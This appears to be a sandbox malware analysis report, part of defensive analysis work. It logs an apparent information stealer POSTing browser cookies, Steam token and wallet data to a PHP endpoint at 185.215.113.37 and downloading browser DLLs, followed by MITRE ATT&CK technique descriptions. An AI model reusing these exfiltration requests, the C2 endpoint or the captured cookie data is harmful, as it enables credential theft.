6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 2d 2d 0d 0a Data Ascii: ------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGCHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 2d 2d 0d 0a Data Ascii: ------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="file"------FHJKKECFIECAKECAFBGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCAHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 2d 2d 0d 0a Data Ascii: ------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file"------CGIJKJJKEBGHJKFIDGCA--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDGHIJDGCBAAAAAFIJHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="message"wallets------HDBGDHDAECBGDHJKFIDG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="message"ybncbhylepme------CFHDHIJDGCBAKFIEGHCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAAHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 2d 2d 0d 0a Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="file"------HIJEGIIJDGHDGCBGHCAA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEBHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 2d 2d 0d 0a Data Ascii: ------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="message"files------GHIJJEGDBFIIDGCAKJEB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAAHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 2d 2d 0d 0a Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HIJEGIIJDGHDGCBGHCAA--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

